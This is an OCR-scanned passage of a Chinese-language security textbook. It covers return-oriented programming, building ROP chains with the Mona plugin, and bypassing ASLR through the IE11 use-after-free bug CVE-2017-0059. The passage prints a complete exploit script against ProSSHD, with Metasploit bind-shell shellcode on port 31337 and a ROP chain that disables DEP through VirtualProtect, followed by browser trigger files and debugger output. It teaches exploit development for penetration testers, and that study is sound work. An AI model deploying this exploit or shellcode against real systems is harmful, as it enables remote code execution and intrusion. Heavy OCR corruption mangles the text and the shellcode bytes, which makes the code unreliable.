栈 指针 指 同 它们 ， 然 后 相继 返回 ， 则 可 控制 进程 并 达到 攻击 者 的 目的 。 这 称 为 返回 
导 回 编程 Returm-Oriented Programming, ROP), ROP ^t HHovav Shacham 提 出 ， 是 
ret2libc 之 类 技术 的 继承 者 。 
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14.53 ”指令 片段 


14.5.2 市 中 提 到 的 小 块 代码 就 是 所 谓 的 指令 厂 段 (Gadget)。 这 里 使 用 “代码 ”这 
个 词 是 因为 ， 它 不 必 是 程序 或 模块 所 使 用 的 指令 。 可 跳 转 到 目标 汇编 指令 中 间 ， 或 
可 执行 内 存 区 域 的 其 他 任何 地 方 ， 只 要 能 执行 所 期 望 的 任务 并 随后 将 执行 流 返回 到 
栈 指 针 指 疝 的 下 一 个 指令 片段 即 可 。 下 面 的 示例 显示 了 ntdll.dll 中 内 存 地 址 
0x778773E2 处 的 目标 指令 : 


lI8T1T3E2 890424 MOV DWORD PTR SS: [ESP], EAX 
TISTISES C3 RETN 


看 一 下 ， 当 从 0x778773E2 跳 转 至 0x778773E3 时 ， 会 发 生 什 么 : 


7219113E3 04 24 ADD AL,24 

TIBTISES C3 RETN 

代码 序列 仍 将 以 返回 结束 ， 但 返回 之 前 的 指令 已 经 变 了 。 如 果 此 代码 有 实际 意 
X, 那么 可 将 其 用 作 指 令 片 段 。 因 为 ESP 或 RSP 所 指向 的 下 一 个 地 址 即 为 另 一 个 ROP 
指令 片段 ，retum 语 句 会 叶 致 下 一 个 指令 序列 被 调用 。 本 书 在 第 11 草 讨论 了 ret2libc， 
这 种 编程 方法 类 似 于 ret2libc， 但 实际 上 也 是 ret2libc 的 后 继 者 。 使 用 ret2libc， 可 用 函 
数 (如 systemO) 开 头 的 地 址 覆盖 返回 指针 。 在 ROP 中 ， 一 旦 控制 了 指令 指针 ， 就 可 将 
其 指向 希望 的 指令 片段 的 指针 位 置 ， 并 通过 ROP 链 返回 。 

一 些 指令 片段 包含 必须 弥补 的 多 余 指令 , 如 POP 等 指令 会 被 动 修 改 栈 或 寄存 器 。 
分 析 以 下 反 汇 编 代 码 : 

XOR EAX, EAX 

POP EDI 

RETN 

在 这 个 示例 中 ， 恶 意 攻击 者 想 要 使 EAX 寄 存 器 清 零 ， 此 后 返回 。 遗 憾 的 是 ， 
间 有 一 个 POP EDI 指 令 。 为 进行 弥补 ， 只 需要 在 栈 上 添加 4 个 字 市 作为 填充 物 ， 以 免 
将 下 一 个 指令 片段 的 地 址 弹 入 EDI。 如 果 EDI 包 含 攻击 者 需要 的 信息 ， 则 这 个 指令 片 
段 可 能 无 法 使 用 。 假 设 可 容忍 这 个 指令 卢 段 中 的 多 余 指令 ， 可 通过 为 栈 添加 填充 物 
进行 弥补 。 再 分 析 以 下 示例 : 

XOR EAX, EAX 

POP EAX 

RETN 

在 这 个 示例 中 ， 只 将 POP EDI 改 为 POP EAX。 如 果 攻 击 者 想 使 EAX 寄存 器 清 零 ， 
那么 多 余 的 POP EAX 将 使 这 个 指令 请 段 变 得 不 可 用 。 还 有 其 他 类 型 的 多 余 指令 ， 
中 的 一 些 指令 ， 如 访问 未 被 映射 的 内 存 地 址 ， 处 理 起 来 十 分 棘手 。 
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14.5.4 构建 ROP 链 


使 用 corelanc0d3r 团 队 的 Mona PyCommand 插 件 ， 可 找 出 针对 给 定 模 块 的 推荐 指 
令 片 段 列表 (使 用 -cp nonull 参 数 ， 确 保 ROP 链 中 不 含有 空 字 节 ): 


Imona rop -m msvcr/1.dll -cp nonull 


该 命令 及 参数 将 创建 以 下 几 个 文件 : 

e 包含 可 用 于 禁用 DEP 的 ROP 链 的 成 品 或 半成品 的 rop_chains.txt 文 件 ， 其 中 调 
用 了 VirtualProtect0 和 VirtualAlloc0 之 类 的 函数 。 使 用 这 些 链 可 节省 因 手 动 创 
建 ROP 链 而 耗费 的 大 量 时 间 。 

e 包含 可 用 于 开发 漏 涧 攻击 程序 的 入 量 指令 衣 段 的 rop txt 文件 。 由 于 生成 的 
ROP 链 通 第 不 能 直接 工作 , 这 时 攻击 者 会 发 现 需 要 寻找 一 些 指令 片段 以 弥补 
缺陷 ， 而 使 用 rop.txt 文 件 将 是 最 好 的 选择 。 

e stackpivot.txt LF H Bl 2 f 42 1 (pivot)TH 47 « 

e 取 识 于 恶意 攻击 者 使 用 的 Mona 友 本， 可 能 会 生成 其 他 一 些 文 件 ， 如 
rop suggestions.txt 和 含有 完整 的 ROP 链 信息 的 XML 文件。 另外 ,生成 的 ROP 
链 取决 于 攻击 者 使 用 的 Mona 版 本 以 及 选择 的 选项 。 


有 关 Mona 的 功 有 
云 行 一 段 时 间 ， 并 生成 输出 文件 ， 输 出 文件 保存 在 使 用 Mona 通 


rop 命 令 将 运 


E 及 参数 的 更 多 信息 ， 请 参 参考 该 工具 的 使 用 于 册 。 


过 Imona config -set workingfolder<PATH>/%p 命 令 选 择 的 文件 夹 中 。 非 常 详细 的 
Top.txt 文 件 的 内 容 如 下 所 示 : 


| gadqets 


0x/c35a002 : 
Ox/c34e03f : 
0x7c35a040 : 
0x/c34c048 : 


# ADD EAX, ECX # RETN ** [MSVCR71.dll]**|(PAGE EXECUTE READ] 
# POP ESI # RETN ** [MSVCR/1.dll] ** | [PAGE EXECUTE READ} 
F MOV EAX, ECX 4 RETN ** [MSVCR71.dll] **| {PAGE EXECUTE READ} 
# DEC ECX # RETN ** [MSVCR/1.dll] ** | [PAGE EXECUTE READ} 


利用 这 个 输出 结果 ， 可 将 各 个 指令 片段 链接 起 来 完成 手头 的 任务 ， 包 括 构建 
VirtualProtectO 的 参数 并 调用 它 。 这 并 非 像 听 起 来 这 么 简单 ， 必 须 对 现 有 的 可 用 信息 
进行 一 些 处 理 ， 这 时 可 能 需要 发 挥 创新 能 力 。 以 下 代码 在 以 ProSSHD 程 序 为 目标 运 
行 时 ， 演 示 了 一 个 可 工作 的 ROP 链 ,通过 调用 VirtualProtect0 孙 数 来 修改 位 于 栈 上 的 
shellcode 对 应 页 面 的 权限 ， 因 而 shellcode 将 可 执行 。wsshd.exe 的 DEP 保 护 已 被 重新 
司 用 。 访 脚本 被 命名 为 prosshd dep.py. 


#prosshd dep.py 


# 一 上 一 coding: 


utf-8 -*- 


import paramiko 
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from scpclient import * 

from contextlib import closing 
from time import sleep 

import struct 


hostname - "192.168.10.104" 
username = "test1" 


password = "asdf" 


t windows/shell bind tcp - 368 bytes 

# http://www.metasploit.com 

# Encoder: x86/shikata ga nai 

i VERBOSE-false, LPORT-31337, RHOST-, EXITFUNC-process, 
shellcode = ( 
"\xdd\xc1\xd9\x74\x24\xf4\xbb\xc4\xaa\x69\x8a\x58\x33\xc9\xbi" 
™\x56\x83\xe8\xfc\x31\x58\x14\x03\%58\xd0\x48\x9c\x7/6\x30\x05" 
"\x5f\x87\xc0\x76\xe9\x62\xf1\xa4\x8d\xe7\xa3\x78\xc5\xaa\x4f£" 
"\xf2\x8b\x5e\xc4\x76\x04\x50\x6d\x3c\x72\x5f\x6e\xf0\xba\x33" 
™\xac\x92\x46\x4e\xec0\x7/4\x7/6\x81\x£5\x7/5\xbE \xfc\xf5\x24\=xz68" 
"\x8a\xa7\xd8\xld\xce\x7b\xd8\xf1\x44\xc3\xa2\x74\x9a\xb7\x18" 
"\x76\xcb\x67\x16\x30\xf3\x0c\x70\xel\x02\xcl1\x62\xdd\x4d\x6e" 
"\x50\x95\x4f\xae6\xa8\x56\x7e\x86\x67\x69\x4e\x0b\x79\xad\x69" 
™\xf3\x0c\xc5\x89\x8e\x16\xle\xf3\x54\x92\x83\x53\x1f\x04\x60" 
"\x65\xcc\xd3\xe3\x69\xb9\x90\xac\x6d\x3c\x74\xc7\x8a\xb5\x7b" 
"\xO08\xlb\x8d\x5£\x8c\x47\x56\xc1\x95\x2d\x39\xfe\xc6\x8a\xe6" 
"\x5a\x8c\x39\xf3\xdd\xcf\x55\x30\xd0\xef\xa5\x5e\x63\x83\x97" 
"\xcl\xdf\x0b\x94\x8a\xf9\xcc\xdb\xal\xbe\x43\x22\x49\xbf\x4a" 
"\xel\xild\xef\xe4\xc0\x1ld\x64\xf5\xed\xc8\x2b\xa5\x41\xa2\x8b" 
™\x15\x22\x12\x64\x7c\xad\x4d\x94\x7£\x67\xf£8\x92\xb1\x53\xa9" 
"\x74\xb0\x63\x37\xec\x3d\x85\xad\xfe\x6b\x1d\x59\x3d\x48\x96" 
"\xfe\x3e\xba\x8a\x57\xa9\xf2\xc4\x6f\xd6\x02\xc3\xdc\x7b\xaa" 
"\x84\x96\x97\x6£\xb4\xa9\xbd\xc7\xbf£\x92\x56\x9d\xd1\x51\xc6" 
"\xa2\xfb\x01\x6b\x30\x60\xd1\xe2\x29\x3£\x86\xa3\x9c\x36\x42" 
"\x5e\x86\xe0\x70\xa3\x5e\xca\x30\x78\xa3\xd5\xb9\x0d\x9f\xfi" 
"\xa9\xcb\x20\xbe\x9d\x83\x76\x68\x4b\x62\x21\xda\x25\x3c\x9e" 
"\xb4\xal\xb9\xec\x06\xb7\xc5\x38\xf1\x57\x77\x95\x44\x68\xb8" 
"\x71\x41\x11\xa4\xel\xae\xc8\x6c\x11\xe5\x50\xc4\xba\xa0\x01" 
"\x54\xa7\x52\xfc\x9b\xde\xd0\xf4\x63\x25\xc8\x7d\x61\x6o1\x4e" 
"\x6e\xlb\xfa\x3b\x90\x88\xfb\x69") 


i ROP chain generated by Mona.py, along with fixes to deal with alignment. 
rop = struct.pack('<L',0x7/c349614) # RETN, skip 4 bytes 
[MSVCR71.d11] 

rop +=struct.pack('<L',0x7/c34728e) # POP EAX # RETN [MSVCR71.d11] 
rop += struct.pack('«L',O0xttfffcdtf) 4 Value to add to EBP, 

rop += struct.pack('«L',0x7c1B451A) # ADD EBP,EAX # RETN 

rop += struct.pack('«L',0x7c34728e) # POP EAX # RETN [MSVCR71.d11] 
rop += sEruct.pack('«L',Uxritttdtrt) # Value to negate to 0x00000201 
rop  1—struct.pack('«L',0x7ce353c13) # NEG EAX # RETN [MSVCR71.d11] 
rop += struct.pack('<L',0x7c34373a) # POP EBX # RETN [MSVCR71.d11] 
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rop += struct.pack('«L',Oxffffffff) # 

rop +t=struct.pack('<L',0x7/c345255)  # INC EBX #FPATAN #RETN MSVCR71 .dll 
rop + =struct.pack('<L',0x7c352174) # ADD EBX, EAX # RETN [MSVCR71.d11] 
rop + =struct.pack('<L',0x7/7c344efe) # POP EDX 4 RETN [MSVCR71.dl11 
rop += struct.pack('«L',OxfíffftfcO0) # Value to negate to0x00000040 
rop +=struct.pack('<L',0x7c35leb1) # NEG EDX 4 RETN [MSVCR71.dll 
rop + =struct.pack('<L',0x7c36ba51) # POP ECX 4 RETN [MSVCR71.dl11 
rop t=struct.pack('<L', 0x/c38f2f4) di &Writable location [MSVCR71.d11l 
rop += struct.pack('«L',0x7c34a490) # POP EDI 4 RETN [MSVCR71.dl11l 
rop += struct.pack('«L',0x7c346cO0b) i RETN (ROP NOP) [MSVCR71.dll 
rop += struct.pack('«L',0x7c352dda) # POP ESI # RETN [MSVCR71.dll 
rop += &bruct.pack('«bL*',Ux/c3415a2) i JMP [FAX] [MSVCR71.d11] 
rop +=struct.pack('<L',0x7c34d060) # POP EAX 4 RETN [MSVCR71.dll 
rop += struct.pack('c«L',0x7c37a151) # ptr to &VirtualProtect () 
rop +=struct.pack('<L"',0x7/7c378c81) # PUSHAD 4 ;— 4 RETN [MSVCR71.dll 
rop +=struct.pack('<L', 0x7/c345c30) # &push esp # RET [MSVCR71.d11] 


req = "\x41" * 489 
nop = "\x90" * 200 


ssh client = paramiko.SSHClient () 

ssh client.load system host keys () 

ssh client.connect (hostname, username-username, key filename-None, 

password-password) 

sleep (1) 

with closing (Read (ssh client.get transport () , reqtropt+tnop+shellcode) 
as scp: 

scp.receive ("foo.txt"™) 


注意 : 可 以 选择 使 用 或 不 用 # -*- coding: utf-8 -*-7 A577. 


尽管 这 个 程序 初 看 起 来 比较 难于 理解 ， 但 当 明 白 下 面 这 一 点 后 ， 就 会 看 出 其 中 
的 门道 : 这 段 代码 实际 上 只 是 把 包含 一 些 有 价值 指令 的 模块 代码 区 域 的 一 系列 指针 
链接 在 一 起 ， 其 后 都 有 一 条 RETN 指 令 用 于 返回 下 一 个 指令 片段 。 有 些 指令 片段 用 
来 加 载 寄存 器 值 (为 调用 VirtualProtectO 做 准备 ), 还 有 一 些 则 用 于 弥补 各 种 问题 以 确 
保 正 确 的 参数 被 加 载 到 合适 的 寄存 右 中 。 当 使 用 由 Mona 生 成 的 ROP 链 时 ， JF ST 
定 对 齐 无 误 ， 将 成 功 调用 VirtualProtect0 函 数 ; 当 使 用 SYSEXIT 指 — 回 用 
户 空间 时 ， 在 用 户 栈 偏 下 位 置 ， 进 入 shellcode 的 中 间 位 置 。 为 补偿 这 一 点 ， 会 手动 
加 载 一 些 指令 户 段 以 确保 EBP 指 站 NOP 雪 优 。 ithe 就 可 
以 减少 很 多 填充 工作 ;， 然 而， 时间 也 可 能 花费 在 其 他 工作 任务 上 。 
在 下 面 的 代码 中 ， 首 先 将 值 0xfffffcdf 弹 入 EAX， 当 它 与 指 癌 shellcode 的 EBP 相 
加 时 ， 就 会 翻转 2^32 并 指向 NOP 雪 构 。 


] 
] 
] 
] 
] 
] 
] 
] 


] 


) 
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rop += struct.pack('«L',0x7c34728e) i POP EAX # RETN [MSVCR71.d11] 
rop += struct.pack ("<L", Oxfffffcdf) # Value to add to EBP, 
TOP += struct.pack ('<L', 0x7c1B451A) # ADD EBP,EAX # RETN 


Doe m ABUS EET — BEE AS HY BY Ss PEU REBP Be TE TR [pI NOP S FERES SJ 
部 。 最 后 的 那 条 指令 执行 了 加 法 运算 。 图 14- SH RR TA 7 前 后 的 变化 。 


4 Immunity Debugger - wsshd.exe - [CPU - main thread, module MSVCR71] 
File View Debug Plugins ImmLib Option Window Help Jobs 


7034728F| C3 as ZI | 
70347298 ESI.H | ; FPPFDPBG 
7C347293| "7F 4E | SU i HBBaBHBHBBHB6 
| i BBBBH168 

BBIZEFS8C. 


了 61B35B kerneli2.CreatePipe 
6612F3A8 


7C34728bE MSUCR71 .7C34'728E 


ES 8023 32bit @CFFFFFFFFY 
CS @@1B 32bit BCFFFFFFFF) 
SS 0023 32bit SEED: 
SCALE, WR [a ret] eee 
aa44caae | Wa|....18 
T | | B012F398 
aa44caae | m 
üm2F3np 


@@12F3n8 
@812F3AC 
901 2F3B8 


图 14-3 ”调整 前 EBP 指向 的 位 置 


E Immunity Debugger = wsshd.exe = [CPU = main thread, module MFC71] m.m» 


[C] File View Debug Plugins Immlib Options Window Help Jobs 
=F + 


MOU EBX.358B0001 | Eos OEFDFODO 
SUB BYTE PIR D$: ! GABBRARG 
ADC AL, 7C "Ds 


PUSH MEC71.7C181 ESP ILE 


PUSH DWORD PTR $ 
ESI 75b1B35B?7 kernel32.CreatePipe 
EDI 8812F3fhB8 
EIP 7CiB45iC HFC7i.'7CiB45iC 


ES 8823 32bit BCFFFFFFFF) 
P8 CS @@1B 32bit BCFFFFFFFF? 
PUSH DUORD PIR "ab A 1 SS @@23 32bit @(FFFFFFFF> 


ATOBi2L477l p 
Q012F07B| 90909099 ÉÉ 
EL ü812r07P| 90909090 ÉÉ! 


DB44CB38 | BH 6 


图 14-4 调整 后 EBP 指向 的 位 置 


可 以 看 出 ， 程 序 在 EBP 调整 前 暂停 ，EBP 正 好 指向 shellcode 的 中 间 位 置 。 图 14-4 
显示 了 调整 后 EBP 指向 的 位 置 。 

正如 看 到 的 那样 ，EBP 已 指向 shellcode 前 的 NOP 雪 机 。 攻 击 程序 中 使 用 的 
shellcode 由 Metasploit 生 成 ， 并 将 一 个 shell 与 TCP 31337 sj HAE. 在 调试 器 中 继续 运 
行程 序 ，shellcode 成 功 执行 并 打开 了 该 亲口， 如 图 14-5 所 未 。 
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[EN Administrator: Developer Command Prompt for V52013 cc x 


Ci\grayhat>netstat -na Ifind "31337" E 
0.0.0.0:31337 0.0.0.0:0 LISTENING 


C: Ngrayhat? 


图 14-5 ”shellcode 打 开 的 端口 


14.6 ”通过 内 存 泄漏 突破 ASLR 


在 上 例 中 ， 绕 过 ASLR 十 分 简单 。 下 面 分 析 一 个 更 复杂 的 例子 ， 明 过 利用 内 存 
潭 漏 缺陷 (Bug) 突 破 ASLR。 访 缺陷 由 Google Project Zero 团 队 的 Ivan Fratric 发 现 ， 编 
号 Jj CVE-2017-0059 , 可 访 问 www.cve.mitre.org/cgi-bin/cvename.cgi?name-CVE- 
2017-00$9 以 获得 相关 信息 。 这 个 缺陷 于 2017 年 1 月 10 日 报告 给 微软 ， 微 软 于 2017 年 3 
月 20 日 发 布 了 补丁 ， 同 日 ， 触 发 缺陷 的 代码 也 公开 了 。Fratric 在 发 布 时 声称 :“ 了 正中 
存在 一 个 释放 后 重用 缺陷 ， 可 导致 信息 泄露 /内 存 汇 漏 ”。 按 微软 的 说 法 ， 访 缺陷 可 
感染 Internet Explorer 9 和 Internet Explorer 11。 在 下 面 的 练习 中 ， 将 使 用 IE 11. 

本 书 从 2017 年 初 开始 撰写 , 并 开始 研究 该 缺陷 ; 在 2017 年 7 月 ,我 们 发 现 , Claudio 
Moletta 完 成 了 一 些 十 分 出 色 的 工作 ， 将 该 缺陷 与 类 型 混 消 缺陷 (最 初 也 是 Ivan Fratric 
发 现 的 ) 结 合 起 来 以 演示 完整 的 代 人 码 执 行 。 类 型 泥 清 缺陷 允许 全 面 控制 指令 指针 。 在 
分 析 内 存 泄漏 缺陷 时 ， 强 烈 建议 浏 贤 一 下 由 Claudio 组 合 在 一 起 的 完整 运行 的 漏洞 攻 
击 程序 。 下 面 将 详细 讲述 释放 后 备用 内 和 存 泄漏 缺陷 ， 以 展现 浏览 器 对 象 科 文本 分 配 
中 的 复杂 性 。 通 过 提供 各 种 触发 代码 文件 ， 可 供 渗透 测试 人 员 目 行 研究 这 个 缺陷 。 
为 此 ， 需 要 准备 运行 IE 11 的 11.0.9600.18537 版 本 的 Windows 7 x64 的 未 打 补 丁 版 本 。 
使 用 Debugging Tools for Windows 8.0 进 行 调试 ， 因 为 Windows 10 Debugging Tools 的 
合并 (Coalescing) 行 为 会 干扰 PageHeap 功 能 的 使 用 。 

如 果 无 法 找到 Windows 7 x64 虚 拟 机 , 可 以 通过 访问 https:/developermicrosoft.comy/ 
en-us/microsoft-edsge/tools/vms/ 来 获得 微软 提供 的 各 种 形式 的 Web 测 试 应 用 程序 。 测 
试 环境 需要 恢复 到 微软 为 该 缺陷 打 补 丁 之 前 的 Intemet Explorer E$: https://www. 
catalog.update.microsoft.com/search.aspx? q=kb3207752. 
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14.6.1 触发 缺陷 
下 面 首先 分 析 由 Ivan Fratric 提 供 的 缺陷 触发 代码 ; 


<!-- saved from url=(0014) about:internet 一 一 > 
«script» 
function run() { 
var textarea = document.getKlementByld ("textarea"); 
var frame = document.createElement ("iframe"); 


textarea.appendChild(frame); 
frame.contentDocument.onreadystatechange - eventhandler; 


form.reset(); 


i 


function eventhandler () { 
document.getElementById("textarea").defaultValue = "foo"; 
alert("Text value freed, can be reallocated here"); 


} 


</script> 

<body onload=run ()> 

<form id="form"> 

<textarea id-"textarea" 
cols="80">aaaaaaaaaaaaaaaaaaaaaaaa</textarea> 


先 分 析 底 部 的 HIML 代码 。 这 里 创建 了 一 个 textarea 对 象 ，ID 为 textarea。 属 性 
cols="80"， 用 于 设置 可 见 文 本 区 域 的 大 小 (字符 数 )， 有 具体 填 充 的 是 25 个 小 写字 母 a。 
MSHTML.DIL 包 含 CTextArea 类 : 

CTextArea::CreateElement (CHtmTag *,CDoc *,CElement * *) 

CTextArea 关 的 CreateElement 成 员 函 数 中 的 反 汇 编 代 码 显 示 了 对 HeapAllocClear 
的 调用 (使 用 的 对 象 大 小 为 0x78 字 节 )， 并 将 对 象 分 配给 隔离 堆 ， 如 下 所 示 : 


mov ecx, g hlsolatedHeap 7 hHeap 
push 78h 
pop edx ; dwBytes 


call ? ?SHeapAl locClear@S00@MemoryProtection@@YGPAXPAXT @Z 


该 行为 是 微软 引入 MSHTML.DILL 的 MemGC 和 隔离 堆 攻 击 防 御 技 术 的 一 部 分 ， 
可 以 极 大 地 抵御 释放 后 重用 缺陷 的 攻击 。Fratric 在 声明 中 表示 :“ 注 意 ， 由 于 文本 分 
配 不 受 MemGC 的 保护 ， 而 且 是 在 进程 堆 上 发 生 的 ， 处 理 文 本 分 配 的 释放 后 重用 缺 
陷 仍然 可 被 利用 。” 本 书 在 研究 这 个 缺陷 时 ， 看 到 文本 分 配 被 分 配给 默认 进程 堆 ， 没 
有 使 用 受 保护 的 释放 ， 这 样 就 可 以 绕 过 MemGC。 
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同样 在 HTML 代 人 码 的 奔 部 ， 可 在 触发 右 中 看 到 : 在 加 载 页 面 时 会 立即 执行 run 函 
数 。 这 里 创建 了 一 个 表单 元 素 ，ID 为 form。 下 面 分 析 run 函 数 ， 该 函数 的 组 成 如 下 
HI: 

function run() { 


var textarea = document.getElementById("textarea"); 
var frame = document.createElement ("iframe"); 


textarea.appendChild(frame); 
frame.contentDocument.onreadystatechange = eventhandler; 


form.reset(); 


} 


首先 使 用 JavaScript document.getElementById7; 3:34 X TextArea7U62& WAZA Se 
textarea。 接 独创 建 一 个 了 这 ame 对 象 ， 赋 给 变量 frame。 将 过 ame 对 象 作为 子 节点 退 加 
到 textarea 节 点 。 之 后 是 fame.contentDocument.onreadystatechange = eventhandler;fV 44 
行 。 下 面 首 先 分 析 文 档 的 readystate 属 性 。 在 加 载 文档 时 ， 可 能 处 于 以 下 状态 之 一 : 
正在 加 载 (Loading)、 交 互 (Interactive) 和 完全 加 载 (FulD)。 当 该 属性 的 值 发 生变 化 时 ， 
将 触发 document 对 象 上 的 readystatechange 事 件 。 因 此 ， 当 iframe 对 象 上 发 生 
readystatechange 事 件 时 ， 将 调用 eventhandler 轴 数 。 调 用 form.reset0O 时 将 重 置 所 有 值 。 
这 导致 fame 贡 点 的 状态 发 生变 化 ， 并 调用 eventhandler 函 数 。 下 面 分 机 eventhandler 

function eventhandler() { 


document.getElementById("textarea").defaultValue = "foo"; 
alert("Text value freed, can be reallocated here"); 


该 函数 将 textarea 对 象 的 value 属 性 改 为 字符 串 fpo。 此 后 是 屏幕 警告 消息 :“Text 
value freed, can be reallocated here. ”考虑 到 一 些 因 系 ,会 重 置 表单 中 的 值 ， 将 textarea 
对 象 的 文本 设置 为 其 他 一 些 值 ， 寻 致 内 存 泄 漏 。 你 将 看 到 ， 调 用 eventhandler 后 ， 在 
textarea 对 象 的 浏览 器 窗口 中 呈现 的 内 容 里 并 未 显示 文本 foo, 而 是 显示 一 些 乱码 ,后 
面 跟着 一 串 a。 正 如 Fratric 所 讲 ， 在 eventhandler 函 数 中 ， 将 value 属 性 改 成 fgo 后 ， 分 
配 内 存 时 ， 会 将 内 存 分 配给 与 仍 被 引用 的 textarea 值 相关 的 已 释放 内 存 。 如 果 可 以 替 
换 为 有 用 的 内 容 ， 那 么 内 存 泄 汤 是 有 意义 的 。 这 里 的 讲述 有 些 超前 ， 有 猜测 成 分 ， 
下 面 需 要 验证 我 们 的 假设 ， 并 设法 绕 过 ASLR。 

ID Fratric 的 原始 触发 代码 。 文 件 名 为 trigger.html。 图 14-6 显 示 了 单 击 

前 的 浏览 费 窗 口 ， 图 14-7 显 示 了 里 击 冤 告 后 的 浏 贤 旧 窗口 。 
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(& C\Users\student\Desktop\... x | 


Message from webpage 


n Text value freed, can be reallocated here 


图 14-6 aS BU BS sas fed O 


hnic cun dicssa. indian. ol (B C\Users\student\Desktop\... X 
| Fite Edit View Favorites Tools Help 


OTFIME::Function Provide 


图 14-7 ca a A as Ba H 


很 明显 ， 单 击 警告 提示 窗口 中 的 OK 按钮 后 ， 结 果 出 现 异 稼 ， 显 示 了 图 数 名 的 一 
部 分 。 当 再 次 刷新 并 单 击 OK 按钮 时 ， 可 以 得 到 如 图 14-8 所 示 的 结果 。 


a C:\Users\student\Desktop\... X 


IF-WMl-patlaaaaaaaaaaaaaaaaa 


图 14-8 ”显示 的 结果 


现在 司 动 PageHeap 并 再 次 运行 甬 友 文件 。 B 7c M Administrator fig S 11 At FI 
c:\Program Files (x86) Windows Kits\8.0\Debuggers\x86>, ， 执 行 命令 gflags.exe /p 
/enable iexplore.exe /full。 启动 PageHeap, PageHeap 将 更 详细 地 跟踪 堆 上 的 内 存 分 配 。 
有 天 PageHeap 内 部 原理 的 更 多 信息 , 请 参见 https://docs.microsoft.conyen-us/Windows- 
hardware/drivers/debugger/gflags-and-pageheap. 同样 在 这 个 命令 提示 会 话 中 ， 运 行 
windbg.exe I, 将 WinDbg 设 置 为 验尸 调试 磊 (Postmortem Debugger). 现在 , 已 为 IE 11 
运行 了 PageHeap， 也 设置 了 验尸 调试 右 ， 可 以 运行 触发 文件 了 。 此 时 ，WinDbsg 弹 出 
JAAN FARCE, We Zl ashe. TE Va ASR T ): 


eax=Obea6fic8 ebx=00000019 ecx=0bea6fc8 edx-Obea6fc8 esi-0dof/fcc 


edi-00000000e1p-2754ac006 esp-09f6b398 ebp-09f6b3a4 iopl-0 nv 
up ei pl nz na pe nc cs-0023 ss=002b ds-002b es-002b fs=0053 
gs=002b efl-00010206 

msvcrt!wcscpy s+0x46: 

/54ac006 Ofb/06 movzx eax,word ptr [esi] 


ds: 007bzÜOdot/7fcc-?7?27 
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指令 movzx eax,word ptr [esi]/Emsvert!wescpy s+0x46A4 RÆ f HAY. Xt6xEMove 
with Zero-ExtendjH? , ‘E224 ESIMT AIA) A FFA WORD JN 4 21132 i HEA X S47 a8 o 
ESIK ARB SE REI ATORRA???) BHT. ROR EUM aR DE 
HTH. BAAN TE ka SH el FEZ. RR La A: 


0:007» Kk 

ChildEBP RetAddr 

O9fob3a4 6f34e8f0 msvcrt!wcscpy st0x46 

09f6b498 6f25508e MSHTML!CKlement: :InjectInternal+0x6fa 
09f6b4d8 6f25500c MSHTML!CRichtext: :SetValueHelperInternal+0x79 
O9fe6b4f0 6f254cf9 MSHTML! CRichtext: : DoReset+0x3f 

09f6b5/4 6f254b/3 MSHTML!CFormElement::DoReset-t0x15/ 


09£65590 711205da MSHTML!CFastDOM: : CHTMLFormElement::Trampoline reset+0x33 


上 面 提 到 的 函数 名 有 DoReset 和 InjectInternal， 这 让 人 怀疑 这 是 form.resetO 
JavaScript 代 码 以 及 将 默认 值 设置 为 foo 的 结果 。 但 此 时 尚 无 法 验证 。 
接 下 来 使 用 WinDbg 扩 展 命令 !heap -p -a esi， 分 析 ESI 指 同 的 内 存 : 


0:007» theap -p -a esi 
address Od6f7fcc found in 
 DPH HEAP ROOT @ 361000 
in free-ed allocation ( DPH HEAP BLOCK: VirtAddr VirtSize) 

d612d68: d6f7000 2000 

verifier!AVrfDebugPageHeapReAllocate-0x0000036d 

ntdll!RtlDebugReAllocateHeap-t0x00000033 
ntdll!RtlReAllocateHeap-*0x00000054 

MSHTML!CTravelLog:: AddEntryInternal-*0x00000215 

MSHTML!MemoryProtection: :HeapReAlloc<0>+0x00000026 

MSHTML! HeapRealloc<0>+0x00000011 

MSHTML! BASTCPROPPARAMS: :SetStringProperty+0x00000546 

MSHTML!CBase::put StringHelper+0x0000004d 


73ec947d 
778711b1 
1182ddc5 
6f56761f 
of54Af48d 
6f54f4406 
6efedeea 
6f1038877 
6f986d60 
SHTML!CFastDOM::CHTMLTextAreaElement::Trampoline Set defaultValue- 
0x00000070 


可 以 看 到 , MSHTML!BASICPROPPARAMS SetStringProperty iiH f HeapReAlloc. 
HeapReAlloc 函 数 用 于 重新 设置 现 有 内 存 块 的 大 小 。 此 行为 通 第 会 导致 从 NITDLL 调 
用 memmove 函 数 。 此 后 释放 内 存 块 的 旧 位 置 。 下 和 耐 在 Administrator 命 令 行 中 使 用 
oflags.exe /p /disable iexplore.exe 关 闭 PageHeap。 

14.6.2 ”跟踪 内 存 泄漏 

接 下 来 处 理 的 触发 文件 是 trigger_with_objecthtml。 下 面 分 析 源 代码 并 查看 发 生 

的 事情 : 


<!-- saved from url-(0014)about:internet 一 一 > 
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Aerie + 
function run() { 
var textarea = document.getElementByld ("textarea"); 


var frame = document.createElement ("iframe"); 


textarea.appendChild(frame); 
frame.contentDocument.onreadystatechange = eventhandler; 


form.reset(); 
function eventhandler() { 


alert ("Before Realloc and Free"); 
document .getElementByld ("textarea") .defaultValue = "foo"; 


var x = document.createElement ("INPUT"); 
x.setAttribute("type", "range"); 

} 

</script> 


<body onload=run () > 

«form id-"form"» 

<!-- «textarea id-"textarea" 
cols-"80"»5aaaaaaaaaaaaaaaaaaaaaaaaac/textarea» 一 一 > 

<script>alert ("Before Creation of Text Area Object: Attach and set 
breakpoints")</script> 

<textarea id-"textarea" 

cols="80">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 

a</textarea> 

<br><input id-"clickMe" type-"button" value="Replace Text With B's" 

onclick="setBs();" /> 


六 号 CTTLPE> 
function setBs() { 
var text = document.getElementById("textarea"); 
// Getting the swapped element 
text.value = "BBBBBBBBBBBBBBBBBBBBBBBBBBP"; 
} 


</script> 


需要 注意 几 个 重要 的 变化 。 首 先 ， 在 textarea 对 象 的 value 属 性 中 增加 了 字符 a 的 
数量 。 增 加 或 减少 字 节 数量 时 ， 会 更 改 分 配 的 大 小 ， 这 最 终 会 替代 已 释放 的 内 存 ， 
尽 可 能 答 试 更 改 这 个 字段 的 大 小 并 分 析 结 果 。 将 值 设置 为 foo 后 , 在 eventhandler 函 数 
中 创建 的 对 象 类 型 、 最 终 的 分 配 都 与 textarea 对 象 的 value 必 性 的 大 小 直接 相关 。 这 和 需 
